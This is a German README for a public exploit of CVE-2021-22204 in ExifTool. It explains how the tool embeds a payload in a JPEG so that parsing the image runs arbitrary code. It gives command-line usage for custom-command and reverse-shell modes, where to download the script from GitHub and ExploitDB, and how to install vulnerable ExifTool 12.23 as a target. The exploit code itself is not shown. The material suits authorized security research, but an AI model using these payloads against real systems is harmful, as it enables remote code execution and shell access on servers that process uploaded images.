
Exploit für CVE-2021-22204 (ExifTool) - Beliebige Codeausführung

Gefällt dir dieses Repo? Gib uns einen ⭐!
Nur für Bildungs- und autorisierte Sicherheitsforschungszwecke.
@UNICORDev von (@NicPWNs und @Dev-Yeoj)
Unsachgemäße Neutralisierung von Benutzerdaten im DjVu-Dateiformat in ExifTool-Versionen 7.44 und höher ermöglicht beliebige Codeausführung beim Parsen des schädlichen Bildes.
Verwenden Sie diesen Exploit, um eine JPEG-Bild-Payload zu erzeugen, die mit einer verwundbaren ExifTool-Version zur Codeausführung verwendet werden kann. Ein benutzerdefinierter Befehl kann angegeben oder eine Reverse-Shell erzeugt werden. Ein JPEG-Bild wird automatisch generiert; optional kann ein benutzerdefiniertes JPEG-Bild bereitgestellt werden, in das die Payload eingefügt wird.
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
-c Modus für benutzerdefinierten Befehl. Befehl zum Ausführen angeben.
-s Modus für Reverse-Shell. Lokale IP und Port angeben.
-i Pfad zu benutzerdefiniertem JPEG-Bild. (Optional)
-h Dieses Hilfemenü anzeigen.
Download exploit-CVE-2021-22204.py from GitHub
Download exploit-CVE-2021-22204.py from ExploitDB
searchsploit -u
searchsploit -m 50911

Exiftool Version 12.23
Exiftool-Versionen 7.44 - 12.23
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
exiftool image.jpg